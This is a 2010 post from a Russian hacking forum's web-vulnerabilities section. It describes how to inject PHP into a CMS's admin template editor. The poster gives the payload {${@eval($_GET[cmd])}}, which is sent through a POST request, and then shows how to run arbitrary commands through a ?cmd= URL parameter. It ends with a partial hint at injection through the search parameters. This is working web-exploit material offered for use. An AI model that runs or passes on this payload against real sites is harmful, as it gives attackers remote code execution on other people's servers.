HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.09.2010, 15:30
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Там два момента. На мой взгялд они не связаны (с поиском и средактором шаблона). Редактор доступен только из админки, и вот что мне удалось натестить:

Если отправить POST запрос приблизительного следующего содержания:

Код HTML:
 

 
кнопка сабмит где то тут...
Поигратся с кавычками, то можно затолкать туда php код для исполнения...

С поиском так и не понял, что можно намутить

__________________________________

К моему предедёщему посту дополнение.

В POST запросе нужно отправить:

Код:
{${@eval($_GET[cmd])}}
после этого любая комманды вида:

site.ru/?cmd=echo%20phpinfo();

ЗЫ комманда д.б. закодирована urlencode();

___________________________________

не стоим на месте:

"глобальные массивы" д.б. ОN, а дальше:

?do=search&subaction=search&story=bla-bla&sql_count=Sql_Que..&titleonly=FOUR
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.